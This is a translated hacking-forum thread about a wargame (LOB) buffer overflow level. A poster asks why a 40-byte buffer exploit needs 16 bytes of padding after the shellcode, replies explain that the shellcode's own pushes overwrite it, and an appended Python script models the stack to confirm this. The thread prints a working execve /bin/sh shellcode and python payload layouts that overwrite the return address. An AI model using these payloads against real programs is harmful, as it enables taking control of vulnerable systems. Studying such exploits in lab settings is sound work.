Level Hacking

   incaro
[LOB question] Why! Does it have to be 16 bytes?

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=3213


* In LOB problem 4, BUFFER is [40Byte], and when I inserted shellcode with the usual buffer overflow method
and solved the problem, I noticed the following.



Question one)
When filling the right side of the shellcode with some value (e.g. NOP) as below,
there is one condition: there must be at least 16 bytes after it.
* Only when there were 16 bytes to the right of the shellcode, as in ⑤ and ⑥, could I get the shell normally..
___________________________________________________________
①[NOP*20] + [shellcode] + [RET]                        (X)
$(python -c 'print "\x90"*20 + "shellcode" + "RET address"')
②[NOP*16] + [shellcode] + [NOP*4] + [RET]         (X)
$(python -c 'print "\x90"*16 + "shellcode" + "\x90"*4 + "RET address"')
③[NOP*12] + [shellcode] + [NOP*8] + [RET]         (X)
$(python -c 'print "\x90"*12 + "shellcode" + "\x90"*8 + "RET address"')
④[NOP*8]  + [shellcode]  + [NOP*12] + [RET]       (X)
$(python -c 'print "\x90"*8 + "shellcode" + "\x90"*12 + "RET address"')
⑤[NOP*4]  + [shellcode]  + [NOP*16] + [RET]       (O)
$(python -c 'print "\x90"*4 + "shellcode" + "\x90"*16 + "RET address"')
⑥[shellcode]  + [NOP*20] + [RET]                       (O)
$(python -c 'print "shellcode" + "\x90"*20 + "RET address"')
___________________________________________________________
Shellcode used :
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
___________________________________________________________
[BUFFER (40Byte)] + [EBP(4Byte)] + [RET (4Byte)]
[          NOP + shellcode + NOP  +  RET address       ]
-----------------------------------------------------------

Question two)
* But it also worked without a NOP sled like the one above, just filling with alphabetic characters.
Example )
             ["A"*4]  + [shellcode]  + ["A"*16] + [RET]         (O)
             ["B"*4]  + [shellcode]  + ["B"*16] + [RET]         (O)
             ["C"*4]  + [shellcode]  + ["C"*16] + [RET]         (O)
             [shellcode]  + ["Z"*20] + [RET]                        (O)
------------------------------------------------------------------------------------
(※ This is not only the case in LOB problem 4.)


But I don't know the exact reason!
Looking forward to a good answer. Have a nice day^^



  Hit : 3579     Date : 2011/06/01 06:30



    
멍멍  Can't understand the question.. sorry  2011/06/02
incaro  Sorry, I asked the question in a very disorganized way.
I've edited it.
2011/06/02
별빛을담아  Isn't it because there is a dummy part? ㄷㅅㄷ
I think I heard that from LOB on, unlike FTZ, there is a dummy;
2011/06/03
incaro  It's the other way around: FTZ has the dummy,
and LOB, with gcc version egcs-2.91.66, has no dummy.
I don't know that rule ;; if anyone knows ㅠㅠ please answer
2011/06/03
guswns0528  When the shellcode runs, it usually modifies esp in order to pass arguments. The direction esp moves is the direction the stack grows, and when values are written with push or mov instructions they overwrite the shellcode. So the shellcode gets an illegal instruction or a segfault while executing. 2011/06/07
incaro  Thanks for the answer. 2011/06/09
멍멍  guswns0528's answer is accurate~ 2011/07/04
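An added example, not part of the thread, that checks guswns0528's explanation against the poster's six layouts: it models the frame described above (40-byte BUFFER + 4-byte EBP filled by the payload, RET right after, esp just past RET once `ret` runs) and walks the 24-byte shellcode's push instructions to see whether any not-yet-executed shellcode byte gets overwritten. The decoder is a constructed minimal one that knows only the opcodes in this shellcode; the filler bytes are assumed harmless, as in the post.

```python
# Added example (not from the original post): model the frame the poster describes
# and check which payload bytes the shellcode's own pushes overwrite.
SHELLCODE = bytes.fromhex(
    "31c050682f2f7368682f62696e89e3505389e199b00bcd80")  # the 24-byte shellcode from the post

BUF_LEN, EBP_LEN, RET_LEN = 40, 4, 4
PAYLOAD_LEN = BUF_LEN + EBP_LEN          # bytes filled before the RET address (44)


def decode(code):
    """Yield (length, is_push) per instruction. Minimal constructed decoder:
    only the opcodes this shellcode uses are known; anything else raises."""
    i = 0
    while i < len(code):
        op = code[i]
        if 0x50 <= op <= 0x57:   length, push = 1, True   # push r32
        elif op == 0x68:         length, push = 5, True   # push imm32
        elif op in (0x31, 0x89): length, push = 2, False  # xor/mov r/m32,r32 (register form)
        elif op == 0x99:         length, push = 1, False  # cdq
        elif op in (0xb0, 0xcd): length, push = 2, False  # mov al,imm8 / int imm8
        else: raise ValueError(f"unhandled opcode {op:#04x} at offset {i}")
        yield length, push
        i += length


def push_count(code=SHELLCODE):
    return sum(1 for _, push in decode(code) if push)


def survives(lead_pad, code=SHELLCODE):
    """True if shellcode placed after lead_pad filler bytes is never overwritten
    before its remaining instructions execute (filler bytes are not modelled)."""
    start = lead_pad
    assert start + len(code) <= PAYLOAD_LEN, "shellcode does not fit before RET"
    esp = PAYLOAD_LEN + RET_LEN      # after `ret`, esp points just past the RET slot
    ip = 0
    for length, push in decode(code):
        ip += length                 # ip is now the next instruction to run
        if push:
            esp -= 4                 # a push writes 4 bytes below the old esp
            written = range(esp, esp + 4)
            not_yet_run = range(start + ip, start + len(code))
            if max(written.start, not_yet_run.start) < min(written.stop, not_yet_run.stop):
                return False         # a not-yet-executed shellcode byte was clobbered
    return True


def min_trailing_pad(code=SHELLCODE):
    """Bytes needed after the shellcode: 4 per push, minus the RET slot itself."""
    return 4 * push_count(code) - RET_LEN


if __name__ == "__main__":
    for label, lead in zip("①②③④⑤⑥", (20, 16, 12, 8, 4, 0)):
        print(label, f"lead pad {lead:2d}:", "O" if survives(lead) else "X")
    print("minimum trailing pad:", min_trailing_pad())  # 16
```

Five pushes consume 20 bytes of stack below esp; the first lands on the RET slot, so 16 bytes of the payload below RET get overwritten, which is exactly the boundary between layouts ④ and ⑤.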